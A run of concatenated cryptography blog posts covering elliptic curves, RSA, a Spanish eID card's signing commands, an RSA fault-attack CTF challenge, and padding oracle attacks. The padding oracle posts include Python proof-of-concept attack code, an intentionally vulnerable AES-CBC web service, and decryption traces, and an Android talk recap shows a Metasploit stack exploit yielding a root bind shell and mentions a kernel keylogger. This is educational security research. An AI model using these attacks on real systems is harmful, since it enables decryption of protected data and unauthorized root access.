We have defined above how an elliptic curve looks like over the reals, and how to perform additions of two points. Obviously, when addition is defined we also have multiplication for free: just add a point to itself several times in a row (although you can do it in smarter and more efficient ways).

But how do we use it for cryptography? I mean, where is the difficult problem here? Actually, the difficult problem is again the discrete logarithm problem. In this case, we define it as follows:

Given a curve E and all its parameters, a base point P and a point Q=nP, obtain n.

And how is this difficult in the curves defined above, you might be thinking... The truth is we do not use real curves in ECC, but we use curves over finite fields instead. We can do it over prime fields GF(p), or we can do it over binary fields GF(2^n). I'll look only at GF(p) here, but similar concepts apply (although the simplified expression I defined above is slightly different in that case).

So, the curve I depicted previously taken over GF(8761) looks like this:

Messy, huh? Exactly the same addition laws apply here, but now when you add two points you draw a line... and when the line gets out of the GF(p) x GF(p) plane it wraps around and comes back from the other side. It is a little more difficult to depict and to visualize, but the concept is the same as before. And now you probably start seeing why this is difficult to solve...

**Why Elliptic Curves?**

Now you might be wondering... why do we use Elliptic Curve cryptography at all? What are the benefits? The answer is that the ECC allows us to use smaller keys than other algorithms like RSA / 'normal' DL systems for the same amount of security.

This is because the best known general methods for solving the DL in Elliptic Curve are of exponential complexity, while for the other systems we know subexponential methods. Hence, the DL problem under Elliptic Curves is believed to be more difficult than the equivalent base problems for other public key cryptosystems.

Now that we know how elliptic curves are used in cryptography and what benefits they have over traditional

**Elliptic Curve Diffie-Hellman**

So, if you remember from when we talked about Diffie-Hellman, this is a key exchange protocol that relies on the Discrete Logarithm problem (and the Diffie-Hellman assumption). Usually this is done over a finite field GF(p), but now we have just defined a group based on Elliptic Curves which we can use as well.

In this case, Alice has a private key and a public key , where G is the base point. Similarly, Bob has and . Alice and Bob exchange public keys, and then each of them can compute a common point .

This protocol relies on the assumption that the DL problem is infeasible in the elliptic curve (which requires a base point G of high order) and the Diffie-Hellman assumption.

**Other ECC algorithms**

Besides the EC Diffie-Hellman algorithm defined above, there are several other algorithms based on Elliptic Curves. For example, one could compute digital signatures using Elliptic Curve DSA or Elliptic Curve Nyberg Rueppel. Each algorithm has its own details, but the important problem used as a foundation for each of them is the Discrete Logarithm problem over Elliptic Curves as we have defined it here.

Beware, however, that similarly to other algorithms, ECC algorithms rely also on other conditions. For example, for ECDSA (and DSA) there is a secret parameter that must be unique, and two signatures with the same value for this parameter will reveal your secret key. As usual, if you implement cryptography. you need to be aware of the requirements and limitations or you will certainly screw up (toc toc SONY!).

]]>I had seen that Thai and Juliano mentioned timing leaks in their talk at EkoParty, but since AFAIK there was no public tool available I decided to look into it. Also, some weeks ago I added the CBC-R encryption part to my scripts, in order to be able to encrypt arbitrary information as long as we are able to control the IV.

So in this post I'm going to write about these two things: CBC-R encryption and a web based padding oracle attack script using timing information.

**CBC-R: Reverting CBC decryption... or encrypting by decrypting!**

Ok, so if you remember from last post, we have a way to decrypt messages making use of a padding oracle. So, by providing specially crafted messages and asking whether the padding is correct or not, we can obtain the plaintext for a given ciphertext.

Now, can we use this for encryption? Well... the answer in general would be no unless you perform a bruteforce search to find the ciphertext that leads to your desired plaintext. However, with CBC mode we have a nice property. When an entity tries to decrypt something using CBC mode, the plaintext is computed as follows

Where is the initial vector. Now, if we control the ciphertext and the initial vector, we can set them up such that the required plaintext comes out when the decryption process takes place.

We start by the last ciphertext block, and set it to a random number. Next, we decrypt it using the padding oracle, which gives us . Given the desired value for , we just need to compute such that . If we continue all the way down to the IV, we have a set of IV + n ciphertext blocks that would produce the desired message.

So, this process I've also implemented in Python together with my previous code. Now it is possible to encrypt data as well, getting an IV that you need to supply to the decrypting entity. If you don't control the IV, you could provide all these n+1 blocks as ciphertext and you would get a leading block which would decrypt to garbage. Since most likely the target application can't handle leading garbage blocks, you'd have to chose another option such as bruteforcing the first block in order to get the desired result. However, this involves much more computational work.

**A " web service" leaking padding information through the time**

After this implementation work, and triggered by the discussion with my friend, I decided to write a sample vulnerable web service and try to exploit it using timing information. To simulate the vulnerable service, I initially used PHP and the openssl functions.

However, since the attack was failing and I thought it was due to a problem in the vulnerable service, I wrote it using web.py . This is nicer because then you only need Python to test it, so I decided to publish only the python version. The code simply listens for requests to the /padding/ path. For GET requests, it encrypts the *msg* parameter under a key and returns the ciphertext encoded using base64.

For POST requests, it receives the ciphertext in the *ctext* variable, decrypts it, checks the padding and if it is good it sleeps for 1 second. This is done to simulate access to a database, filesystem, or any other kind of activity that would happen under normal situations. Next, both with good and bad padding it returns the same information. This is the code:

```
import web
import struct
from Crypto.Cipher import AES
from base64 import b64decode,b64encode
import time
urls = ( '/padding/', 'padding')
app = web.application(urls, globals())
key = "cacacacacacacaca"
def oracle(ctext):
oracleCipher = AES.new(key,AES.MODE_CBC,"\x00"*16)
ptext = oracleCipher.decrypt(ctext)
paddingLen = struct.unpack("B",ptext[-1])[0]
goodPadding = (ptext[-paddingLen:] == struct.pack("B",paddingLen)*paddingLen)
return goodPadding
def encrypt(data):
paddingLen = 16 - len(data) % 16
data = data + struct.pack("B",paddingLen)*paddingLen
cipher = AES.new(key,AES.MODE_CBC,"\x00"*16)
return b64encode(cipher.encrypt(data))
class padding:
def GET(self):
i = web.input(msg='secret!')
return encrypt(i.msg)
def POST(self):
i = web.input(ctext=None)
if(i.ctext!=None and oracle(b64decode(i.ctext))):
time.sleep(1)
return "Yeah!"
if __name__ == "__main__": app.run()
```

So as you can see, the only difference between correct and wrong padding in this case is the timing information. Now we can try to exploit it by performing requests, checking the timing and seeing if it's high or not. Of course, the delay is quite high (1 second) in this case, but it all boils down to how big a time delta you can detect through the network. The use of 1 second is just to make it simple during the tests.

**Attacking timing leaks in Padding Oracles**

Ok, now we have a vulnerable service. Our next step is to create an attack tool. I first created a class (TimingWebPaddingOracle) that is able to perform HTTP requests and analyze the time it takes to receive a response. The class also allows to define POST variables to be added to the request, and to define one of such variables as the *oracle variable*. You should also provide a default value for each of them, being the value given for the *oracle value* a *correct ciphertext* (i.e. one that produces good padding after decryption).

Once this is defined, you can analyze the timing of the correct and incorrect padding cases. To that end, the class first analyzes the original value of the *oracle variable* and next it changes the last bytes and analyzes the timing again. Then, it takes the middle value between the two timing values obtained as a threshold. Also, it stores whether a delay higher than the threshold means the padding is correct or not based on this analysis.

From there on, you can use the oracle. If the timing obtained is higher than the threshold, then it will return true or false depending on the type of oracle we have. In most of the cases, this will happen for a correct padding because then the application will proceed with other calculations.

I won't comment on the code here, you can take a look at it from the classes added at the end. The following is the code of the application used to test it:

```
from PaddingOracle.TimingWebPaddingOracle import TimingWebPaddingOracle
from base64 import b64decode,b64encode
from PaddingOracle.DecryptionOracle import DecryptionOracle
import sys
def hex_string(data):
return "".join([ hex(ord(i))+" " for i in data])
blockSize = 16
url = "http://localhost:8080/padding/"
if __name__ == '__main__':
if (len(sys.argv) <= 1 ):
ctext = "szkAlVFq+Nh4yOt4prAwBtwRVvt51HIyU9o58+2Bxuo=" #Default ciphertext
else:
ctext = sys.argv[1];
if ( len(sys.argv) > 2):
reqs = int(sys.argv[2])
else:
reqs = 1 #Default to 1 request
webOracle = TimingWebPaddingOracle(url,b64encode,b64decode,reqs)
decOracle = DecryptionOracle(webOracle.oracle,blockSize)
webOracle.add_variable("ctext",ctext,True) #Add oracle variable with original value
print "Analyzing oracle..."
if(webOracle.test_oracle()):
print "Oracle successfully analyzed. Analyzing provided ciphertext..."
msg = decOracle.decrypt_message(b64decode(ctext))
print "Message: "+str(msg)
print "In hexadecimal: "+hex_string(msg)
else:
print "Could not analyze oracle :("
```

As you can see, it sets the URL, and provides an encoding and decoding functions to the TimingWebPaddingOracle function. These are used to decode the original ciphertext when analyzing the original value provided in the command line and to encode it when sending it to the web app.

The message to be decrypted is assumed to contain proper padding, so it is used first to analyze the oracle and then it is decrypted using the DecryptionOracle class. By default, the test uses 1 request per ciphertext to be tested. If an additional integer is provided, it uses so many requests and performs an average of the time obtained.

This is a trace of its execution:

```
eloi@XXX:~/dev/PaddingOracle/src$ python PaddingOracleTest/WebPaddingOracleTest.py "7TciRV2X4vFKuiUqz1g2SdfFQ4ry8mNKSxE73lknqd4ooeQrnW2AWQ0mv2FFyWod"
Analyzing oracle...
Found difference for i=0x0
Original timing: 1.00866293907
Bad timing: 0.00569581985474
Oracle successfully analyzed. Analyzing provided ciphertext...
Message: supersecret with limited entropy
In hexadecimal: 0x73 0x75 0x70 0x65 0x72 0x73 0x65 0x63 0x72 0x65 0x74 0x20 0x77 0x69 0x74 0x68 0x20 0x6c 0x69 0x6d 0x69 0x74 0x65 0x64 0x20 0x65 0x6e 0x74 0x72 0x6f 0x70 0x79 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10 0x10
```

As you can see, the message was correctly decrypted

**Code**

If you reach this point, you deserve being able to download the code ;). I've uploaded all the code in its current state (DecryptionOracle, CBC-R encryption oracle, TimingWebPaddingOracle and some the test cases) to the following URL:

http://www.limited-entropy.com/docs/PaddingOracle_0.2.tgz

Remember this is just PoC code and not release-quality code. Again, you can do whatever you like with it but it would be nice to give credit if you use it or base your stuff on it :-).

As for things you need to run it, you need Python (obvious ) with the following extra packages: web.py for the test service and pyCrypto for the cryptographic functions.

]]>Padding Oracle attacks were introduced in 2002 in paper [1]. After that, several other papers have presented similar attacks based on the same concept for other padding schemes. In this post, I will restrict myself to the padding scheme presented in [1] and will add a list of references at the end for further reading.

**Oracles and Padding Oracles**

In cryptography, an oracle is basically a black box that responds to queries. For instance, an encryption oracle will encrypt any input you give to it under a certain key. A random oracle will always respond with uniformly random data, and this is useful to model protocols based on hash functions.

In our case, we are interested on *padding oracles* (PO). A PO is a sort of black box that decrypts an input message and tells you whether the padding was correct or not. For instance, think of an application that receives an input ciphertext and decrypts it using a block cipher.

Since a block cipher encrypts data in chunks of a given size, whenever the data to be encrypted does not fit exactly in a number of chunks it needs to be padded. Thus, after decryption our example application will check the padding applied and will throw an exception if the padding is incorrect. If it is correct, it will just continue with its normal processing.

As you can see, this application is an example of a *padding oracle* because it is telling us whether the padding is correct or not. We can check the behavior of the application and when we observe an exception we know that the padding was incorrect. When we do not, we know it was correct.

**Mounting attacks based on padding oracles**

So, how can we use such a PO to mount an attack on the system? The answer is it depends on the underlying cipher mode and on whether it is used properly or not, of course. Assuming the application uses a cipher in CBC mode, and it does only use encryption but no authentication, we can feed the application with specially crafted ciphertext and make assumptions about the plaintext based on the response.

Before going into the attack method, let's define the padding system we are going to look at. The PKCS#5 standard defines a padding scheme that works as follows: If the message length is a multiple of the block length, the padding scheme adds an extra block with all bytes set to the number of bytes in a block. Otherwise, the remaining bytes will be set to the number of padding bytes that need to be added to have an exact number of blocks.

If the block size is 8 bytes, then for a 7 bytes message you will add a byte set to 01; for a 6 bytes message, 2 bytes set to 02, and so on. I bet you get the idea

Now, when you decrypt in CBC mode, the process works as described earlier in this blog: first you decrypt a block, and then XOR it with the previous ciphertext block (or the IV if it is the initial block). This means that if you get a random data block, then append a target ciphertext block to it, and feed it into the random oracle, you will know whether the decryption of your ciphertext block XORed with your random data adheres to the padding scheme or not.

So, now we know that the decrypted message XORed our random data ends with either 1 byte set to 0x01, or 2 bytes set to 0x02, or 3 bytes set to 0x03, etc. In the most likely case, you'll be lucky with the first option. However, you still need to check, since it might be that by chance you got one of the other options.

How do you know then? Easy: start modifying bytes one at a time and feed them to the Oracle. To make it generic, start from the left-most byte. Modify it, and check with the oracle if the padding is incorrect. If it is incorrect, that means this byte was part of the padding, so the whole thing should be all 0x08's (assuming 8 byte blocks). If it is correct, continue with the next byte until you see that the padding turns incorrect or you reach the last byte.

This is what the original *last byte decryption* algorithm describes:

1. pick a few random bytes r1 , . . . , rb and take i = 0

2. pick r = r1 . . . rb-1 (rb XOR i)

3. if O(r|y) = 0 then increment i and go back to the previous step

4. replace rb by rb XOR i

5. for n = b down to 2 do

(a) take r = r1 . . . rb-n (rb-n+1 XOR 1)rb-n+2 . . . rb

(b) if O(r|y) = 0 then stop and output (rb-n+1 XOR n) . . . (rb XOR n)

6. output rb XOR 1

In the description above, b is the number of bytes in a block. In steps 1 to 3 it is discovering the last byte as I explained above. It creates b random bytes, and modifies only the last one until it gets a message with the right padding. Then it replaces this last byte with the correct value.

Now, using this value for *r* it has a good padding, so it starts modifying the bytes from the top and checking if this changes the results. If the result is not affected in any of the cases, then the last byte was set to 0x01 after decryption, and this means the last byte of the decrypted plaintext is our random byte rb XORed with 0x01. The same holds for the other cases, only that you need to XOR the random bytes with the appropriate value.

So the above algorithm works for the last byte, and if you are lucky for some other bytes as well. How do we turn it into a block decryption oracle?

Quite simple: assuming you know the final X bytes, generate a random block that after XORing with those known bytes sets the result to X+1. Now, the final block ends with an unknown byte followed by X bytes set to X+1... so now you start trying values to XOR with that unknown byte until you get a good padding response. At that point, you know that this unknown byte XORed the random data you supplied must give X+1 as a result to form a good padding (remember, good padding = Y last bytes set to a value Y).

So now you know one more byte, and you only need to iterate all the way till the end of the block to finish the decryption. The following algorithm was provided in the original paper:

1. take rk = ak XOR (b - j + 2) for k = j, . . . , b

2. pick r1 , . . . , rj-1 at random and take i = 0

3. take r = r1 . . . rj-2 (rj-1 XOR i) rj . . . rb

4. if O(r|y) = 0 then increment i and go back to the previous step

5. output rj-1 XOR i XOR (b - j + 2)

In this case, ak with k=j,...,b are the bytes you know. In step 1 you generate the random bytes that would set the final bytes to the appropriate value. Then you add some random numbers to them, and loop through the possible values for the unknown byte until you find the one that creates a proper padding (step 4). From this one, you construct the value for the unknown byte and return it in step 5.

**Implementing the attack in Python**

To make sure I understood what I explained above in the right way, I created a small python class able to decrypt any input block given a padding oracle. The class constructor takes an input block size together with a padding oracle in the form of a function returning a boolean value.

This means you can construct your own padding oracle function in python, which will simply return True or False depending on whether the padding was correct or not. This function can be a simple POC to test the concept or can be a function using a padding oracle present on a web site or whatever you can think of. See the presentation by Juliano Rizzo and Thai Duong ([3]) linked at the end for ideas ;).

By the way, the code quality might not be very good and some things might be done easier in Python than I've done them. I'm pretty new to Python so if you see anything you think should be changed let me know ;-). As for the code, you can do whatever you like with it.

As an example, I've used the following code to test the class:

```
'''
Created on Jul 4, 2010
@author: Eloi Sanfelix < eloi AT limited-entropy.com >
'''
from PaddingOracle.DecryptionOracle import DecryptionOracle
from Crypto.Cipher import DES
import random
import struct
def hex_string(data):
x = struct.unpack("B"*len(data),data)
return "".join([ hex(i)+" " for i in x])
#Random key globally initialized
key = "".join([struct.pack("B",random.getrandbits(8)) for i in range(8) ])
def oracle(ctext):
oracleCipher = DES.new(key,DES.MODE_CBC,"\x00"*8)
ptext = oracleCipher.decrypt(ctext)
paddingLen = struct.unpack("B",ptext[-1])[0]
goodPadding = (ptext[-paddingLen:] == struct.pack("B",paddingLen)*paddingLen)
return goodPadding
if __name__ == '__main__':
#Random 2 block plaintext
bytes = ""
data = "".join([struct.pack("B",random.getrandbits(8)) for i in range(16) ])
print "Plaintext: "+hex_string(data)
cipher = DES.new(key,DES.MODE_CBC,"\x00"*8)
ctext = cipher.encrypt(data)
print "Ciphertext: "+hex_string(ctext)
decryptOracle = DecryptionOracle(oracle,8)
#Recover first block
result = decryptOracle.decrypt_message(ctext)
if(data == result ):
print "CORRECT ptext recovered: "+hex_string(result)
else:
print "INCORRECT ptext recovered: "+hex_string(result)
```

Which provided the following output:

```
eloi:~/dev/PaddingOracle/src$ python PaddingOracleTest/DesPaddingOracle.py
Plaintext: 0xd4 0xe2 0x4b 0xdf 0xed 0xad 0x75 0x58 0xfa 0x0 0xa5 0x45 0x17 0xc7 0x9b 0x5f
Ciphertext: 0x98 0x8 0xd8 0xaf 0x69 0xab 0x34 0xe1 0x4a 0x61 0xa7 0x34 0xb2 0xc8 0xf 0x2b
CORRECT ptext recovered: 0xd4 0xe2 0x4b 0xdf 0xed 0xad 0x75 0x58 0xfa 0x0 0xa5 0x45 0x17 0xc7 0x9b 0x5f
eloi:~/dev/PaddingOracle/src$
```

You can see it works for my test case. I also tested it using AES encryption insted of DES and it works fine there too, which gives me confidence enough that the concepts above are correctly explained and the tool works appropriately

You can download the whole package with my DecryptionOracle class and the test cases here.

Hope you enjoyed it and I'm looking forward to see your feedback in the comments!

**References**

There is more to padding oracle attacks than exposed here. If you want to know more, you can check the following resources. I might be implementing other attacks as well in the future, but the fastest way to know more will be to read these papers:

[1] Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC, WTLS... - S. Vaudenay - Download here

[2] Padding Oracle Attacks on the ISO CBC Mode Encryption Standard - K.G Patterson and A. Yau . Download here

[3] Practical Padding Oracle Attacks . Juliano Rizzo and Thai Duong . Download here

I'll start off with the description of the standard and continue with an explanation on how the DNIe drivers do it. Yes, you are reading it right, they use different APDUs than the ones defined in CWA14890, at least in the OpenSC module I'm using as a base for this analysis.

**Electronic signatures in CWA14890**

According to the CWA14890 specifications, in order to ask the card to compute an electronic signature one has to load a hash value into the card. The hash value can be computed completely on card, partially on card or completely off card.

This means you can choose between sending the plaintext data to the card and let it hash it, compute part of the hash outside the card and send an intermediate result together with the rest of the data or compute the complete hash on yourself. This is done with the following APDUs (copy-paste from the standard):

- On card hashing
- Hashing partially on card
- Hashing off-card

PSO( INS = ‘2A’, // PERFORM SECURITY OPERATION

P1 = ‘90’, // return hash code if required by Le

P2 = ‘80’, // plain value

data = plain data to be hashed)

PSO( INS = ‘2A’, // PERFORM SECURITY OPERATION

P1 = ‘90’, // return hash code if required by Le

P2 = ‘A0’, // input template for hash computation

data = ‘90’ L90 <intermediate hash result> || ‘80’ L80 <rest of the data> ;

PSO( INS = ‘2A’, // PERFORM SECURITY OPERATION

P1 = ‘90’, // return hash code if required by Le

P2 = ‘A0’, // input template for hash computation

data = ‘90’ L90 <hash value>

Now, once the card has a working hash, you can ask it to compute an electronic signature with this APDU:

PSO( INS = ‘2A’, // PERFORM SECURITY OPERATION

P1 = ‘9E’, // COMPUTE DIGITAL SIGNATURE

P2 = ‘9A’, // data to be signed

data = absent) // data already in ICC

In our case, the DNIe requires these messages to be sent using secure messaging. Further, it requires to perform user authentication (i.e. sending the PIN) before the signature command is issued. Also, before calling the PSO - Compute Digital Signature command we should select the desired private key with a Manage Security Environment command.

Therefore, the sequence of commands to request a signature from the card after establishing a secure channel could be something like this:

- VERIFY: wrap(0C 20 00 00 Lc PIN)
- Manage Security Environment command: wrap(0C 22 41 B6 Lc 84 L84 <keyid>)
- Hash command: wrap(0C 2A 90 80 Lc <plain data>)
- Sign command: wrap(0C 2A 9E 9A 00)

Where wrap means wrapping the APDU using Secure Messaging. This means encrypting the data and adding a MAC to authenticate the APDU header and the data.

**Signing: the libopensc-dnie way
**

As I was saying, the procedure described above complies with the CWA14890 specs. And there I was trying to get it working using the APDUs defined in CWA14890 and scanning through my logs, when I realized that I could not find those APDUs anywhere in the logs! WTF? Could they be doing things in a different way?

As I was puzzled by the logs, I decided to go to the source of these APDUs: the binary driver.

Loading that driver into IDA Pro, I could easily find the function that implements the signature process. Reversing that function a bit, one can find out that the following communication happens when a signature is requested:

- The data to be signed (direct input to the RSA signature operation, padding performed outside the card if needed) is loaded into the card with this command: wrap(9C 58 00 Lc <data>)
- A signature is requested by the card with the following command: wrap(9C 5A 80 <keyRef> 00). Here <keyRef> is 01 for your authentication key and 02 for signing key.
- The initial response is parsed and more data is obtained using Get Response if needed (i.e. if SW1=0x61, then there are SW2 bytes available).

So there we got it, they are actually using something that does not adhere to the CWA14890 standard! I'm quite sure I must have been doing something wrong when trying to get it working the CWA14890 way, but since I don't have the complete documentation I found this way much easier... although it required some reversing with the help of IDA and the sources for OpenSC.

**Further work**

With the information I've dumped into these three posts on the DNIe, anyone interested should be able to understand how this device works and how electronic signatures are requested from it.

Some more work would need to be done in order to completely understand the interface the device provides and to make a fully compliant open source driver. As far as I know, most of the work left now should be related to understanding the file system structure, and of course implementing all this in an open source driver if desired.

On my side, this completes the analysis of the device for now. I'll conclude this series of posts with an article giving tips on how to find some of the information needed to implement the communication, including some links to source code that might be useful.

Unfortunately I can't share my code because part of it has been reused from non-public sources. Anyway, I think the information available in these posts together with the key for device authentication is all you need.

]]>I was asked to prepare a cryptography challenge for it, and I delivered a little problem that became the level 4 challenge in the crypto category. The problem is based around RSA with 2048 bit keys and AES in ECB mode with 128 bit keys.

The idea was to give some real crypto instead of the typical break-classic-crypto or find-the-needle-in-the-haystack challenges. Of course, I am not asking you to factor an RSA-2048 modulo (well, I am, in a way...) nor breaking AES in a mathematical sense because that is not feasible nowadays. You have to find the trick ;-).

Want to challenge yourself? Give it a try!

I'll leave the challenge here, and the solution will be published in SecurityByDefault in some time. If you have questions or want to share ideas with me you can use the comments, but please do not spoil the solution for other readers!

These are the instructions:

Dear agent,

In one of our missions we have intercepted an email containing a file encrypted with AES in ECB mode with a 128 bit key. Together with the file there was what we suspect is the AES key encrypted with a 2048 RSA key, which we found to be as follows:

-----BEGIN PUBLIC KEY-----

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6FJCdwpmaYxkSWFa1I9w

5f9/ScpFM0N9hTZ+GvOPMao1lI6zP5eI9xZKHdXDh1v4a2k72MyC4svL0Bz30bRR

72fLcpD6eQ7hAiTjcls3trw9U1banQ+6weBrsm/yQwPZBtPJZsgbGZp4ue8CKw+5

KOWC/AzgKVf2sWQhAfkug0qrRySe5AjCkdP86HLBRGkSMTf02kkoAHUDNkcgafTi

S0oOPuUVha54aEOjwDlhwhKh45TScegmFMTnqh1dpBYBH5tAgajkcGV1Gt7eUdCQ

l/uKQay+LlRcttQEQB1ZFsP2hhbpZnmzX3d0qeRCsZh0FLAi7gbwD6w93bYUGUPl

UwIDAQAB

-----END PUBLIC KEY-----The encrypted AES key is as follows:

19303a82cbc50a56dc22f9aafc554da2ea632e33bee1d33c35edb13269ba0fd2fa791744e86eda7fc1cb15433f1232f86a42afcd5470215ccf0d05096ce1b8f075e6dc45df74896345297fcc145a4765aeaea78babaa6441ead3a2e73b37931dc7c07d4e04b7115284c7c04c85a61c7e555194d0f4ee762d47a8aeec2efcd75ee45e3e6a65f876f9a67aa01016f3ce9552d8f0b50cc150c70333aa6ac3a4ac8860d2879cad8439566f0ffda32612cb75dd9c1b456a4e1828582f05932f495452f19d71f300f2f48b8c1f8cde1b1b8d8ada3f6ff506e10d5d18d91d61402bc36756a88196381ff795980eee932a179525264e3a968f0abe9edbe672560c41833a

Although it was a tough mission, our Operations team did a great job and was able to provide the following information on the target:

- It uses a cryptographic device that contains a 1024 bit modular exponentiation accelerator

- The device uses the same key for decryption and for signature generationIn addition, the Operations team modified the hardware used by our target and was able to collect a pair of RSA signatures over the same data. One of these signatures contains a fault injected thanks to our hardware modification, while the other one is the correct signature. These are the signature values:

S1:

3ae81964c8ecf1524b47c42cb0ecd2a3b6768dccd55960d7ff0a998f839b8c312a2cd821c270ae961777dd4dd50aa631fe823a8afd914911adf69c1c6cfda3b3aed01dad372cfdd6e9f63a4cc39e1a455cbfd04dea72bf07c4790d5fec469198ce28113d6d38a7baced9d3c3695ab27cbc5ab434aa8d2b5f53f66a383e079ddaed485d4a2b446e410eafcadbba9f159494c28c4a19fd416dff90f8c141e96d8260f8e6e0901832e31899c48ce0cbdae6a24595a19a01e490c87e7b48860e09006920d8ef7384217358c6db90638d6e8cbc795a091240f24105d8f3b27fe4b98fe9a507e00590b4cded41777b1b8967b0f752231e0e856b8f0132bde30a6e082eS2:

391e0340e5931a202012572ddacad877e5af3a1d846b70c1e64e3041f9ac0a3c7e8f82621df908eadca44fe777a6b1c799610be829e13ca233982fd268034addb5a79fa19f984631fdf3a61d32fc75ed77176c7a0b719504e804076dca66f10111aa124a7efe743ada75dda2ec53f3c28882a7724928685918261739f960a3648aa3eadc426181aa146a8ba0ff20f1c53de2113e0196af09595dc2ad1a0fe12096ff681f61363044615a7f72edf1f8c6531055e66c1e5f4498434c731d2308fecae46c779379ea3d7d7a5f1c2a0efeb5bc1b8a4af4fb21fce1dae943c27043e86642b3b1e6b889a31e7c4bc01bc2ebae4dc8432344532567d1d3df8b9bcafcbfUnfortunately, the team was not able to obtain the private RSA key nor decrypt the AES file. It is critical for the mission to obtain the contents of the encrypted file. Your task is to obtain the contents of the AES file.

Good luck!

PS: All RSA operations are RAW operations. This means no padding, just modular exponentiation. For keys smaller than the modulus, the padding is null (i.e. zero bytes).

And the file encrypted with AES can be found here.

]]>Despite this fact, the algorithm seems to have been invented by Clifford Cocks, a british mathematician who worked for a UK intelligence agency. Since this work was never published due to the top-secret classification, the algorithm received its name from Rivest, Shamir and Adleman who were the first to discuss it publicly. A document declassified in 1997 revealed the fact that Clifford Cocks had actually described an equivalent system in 1973.

Let me remind you once again that these posts are not intended to be 100% accurate in a mathematical sense, but an introduction for people who doesn't know much about cryptography. If you want more accurate and complete descriptions, take a crypto book such as the Handbook of Applied Cryptography I've linked in most of my posts :).

**Setting up the RSA algorithm**

The RSA algorithm is based on the assumption that integer factorization is a difficult problem. This means that given a large value *n*, it is difficult to find the prime factors that make up *n*.

Based on this assumption, when Alice and Bob want to use RSA for their communications, each of them generates a big number *n* which is the product of two primes *p,q* with approximately the same length.

Next, they choose their public exponent *e*, modulo *n*. Typical values for *e* include 3 (which is not recommended!) and (65537). From *e*, they compute their private exponent *d* so that:

Where is the Euler's totient of n. This is a mathematical function which is equal to the number of numbers smaller than n which are comprimes with n, i.e. numbers that do not have any common factor with *n. *If *n* is a prime *p*, then its totient is *p-1* since all numbers below *p* are comprimes with *p*.

In the case of the RSA setup, *n* is the product of two primes. In that case, the resulting value is *lcm((p-1)(q-1)*) because only the multiples of *p* and *q* are not comprimes with *n*.

Once our two parties have their respective public and private exponents, they can share the public exponents and the modulus they computed.

**Encryption with RSA**

Once the public key (i.e. *e* and *n*) of the receiving end of the communication is known, the sending party can encrypt messages like this:

When this message is received, it can be decrypted using the private key and a modular exponentiation as well:

**Example**

```
sage: p=random_prime(10000)
sage: q=random_prime(10000)
sage: n=p*q
sage: p,q,n
(883, 2749, 2427367)
sage: e=17
sage: G=IntegerModRing(lcm(p-1,q-1))
sage: d = G(e)^-1
sage: G(d)*G(e)
1
sage: m=1337
sage: G2=IntegerModRing(n)
sage: c=G2(m)^e
sage: c
1035365
sage: m_prime=G2(c)^d
sage: m_prime
1337
```

In the commands above, I first create two random primes below 10000 and compute n. Then I create a IntegerModRing object to compute things modulo lcm(p-1,q-1) and perform the computation of the private exponent as the inverse of the public exponent on that ring.

Next, I create a new ring modulo N. Then I can use the public exponent to encrypt a message *m* and use the private exponent to decipher the cryptotext *c*... and it works!

**Correctness of RSA encryption/decryption**

We have seen it works with our previous example, but that doesn't prove that it really works always. I could have chosen the numbers carefully for my example and make them work.

Euler's theorem tells us that given a number *n* and another number *a* which does not divide *n* the following is true:

Therefore, and since , for any message *m* that does not divide *n* the encryption and decryption process will work fine. However, for values of *m* that divide *n* we need to use more advanced maths to prove the correctness.

Another way to prove it is to use Fermat's little theorem and the Chinese Remainder Theorem. I will explain these theorems in my next post and then I will provide a complete proof based on them.

**RSA for signing**

In the case of RSA, digital signatures can be easily computed by just using *d* instead of *e*. So, for an RSA signature one would take message *m* and compute its hash *H(m)*. Then, one would compute the signature *s* as:

For verifying the signature, the receiving end would have to compute the message hash *H(m) *and compare it to the hash contained in the signature:

Therefore, if the hash computed over the received message matches the one computed from the signature, the message has not been altered and comes from the claimed sender.

**Security of RSA**

In order to completely break RSA, one would have to factor *n* into it's two prime factors, *p* and *q*. Otherwise, computing *d* from *e* would be hard because *(p-1)* and *(q-1)* are not known and *n *is a large number (which means that computing its totient is also difficult).

In a few posts I will show an algorithm to solve the factorization problem. However, another way to break RSA encrypted messages would be to solve a discrete logarithm. Indeed, since , if one solves the discrete logarithm of *c* modulo *n**, *the message would be recovered.

Luckily, we already know that discrete logs are not easy to compute. And in this case, solving one does not break the whole system but just one message.

]]>You can also find Javi's post on the RootedCON here. It's in Spanish, don't say I didn't warn ;-). You can also find the slides of our presentation here.

**Examples from our presentation on Android exploitation**

First things first, here is the examples we used during the presentation. As a quick summary, this is how I use the buffer overflow exploit.

First, launch the emulator and wait for it to start. Then, with adb you need to forward a couple of ports: 2000 for the vulnerable apps and whatever you like for your bind shell. Then you can launch the binary, which I had uploaded using *adb push* to /data/bin/myapp:

```
eloi@EloiLT:~/android/paper$ adb forward tcp:2000 tcp:2000
eloi@EloiLT:~/android/paper$ adb forward tcp:2222 tcp:2222
eloi@EloiLT:~/android/paper$ adb shell
# /data/bin/myapp
```

Now, you can launch the exploit from metasploit:

```
msf > use exploit/linux/misc/android_stack
msf exploit(android_stack) > set payload linux/armle/shell_bind_tcp
payload => linux/armle/shell_bind_tcp
msf exploit(android_stack) > set RPORT 2000
RPORT => 2000
msf exploit(android_stack) > set LPORT 2222
LPORT => 2222
msf exploit(android_stack) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (127.0.0.1:55207 -> 127.0.0.1:2222)
[*] Command shell session 1 closed.
msf exploit(android_stack) > exploit
[*] Started bind handler
[*] Command shell session 2 opened (127.0.0.1:34834 -> 127.0.0.1:2222)
/system/bin/id
uid=0(root) gid=0(root)
exit
[*] Command shell session 2 closed.
msf exploit(android_stack) >
```

The same thing applies to the cpp_challenge demo application. You just use a different exploit, but that's it. Beware that you might have to tune some addresses on your local installation, as they are hardcoded. However, I believe they should be static for every installation.

In addition to apps and the metasploit stuff, you can also find two kernel modules. One is a simple *find syscall table* module, and the other one is a keyboard logger. The latter only works for linux >= 2.6.28, for earlier versions you need to change it slightly.

**RootedCON mini-summary**

I won't spend much time on it, as it's been quite some time already and I don't feel like writing a complete summary of it.

Overall I think it was a great event. Sure there is stuff that can be improved as everywhere, but for being the first edition it was very good. From the talks I attended, in my opinion there were great talks but also a one or two I didn't really like. On our side, we are pretty happy with the way it was received and the reactions we have seen

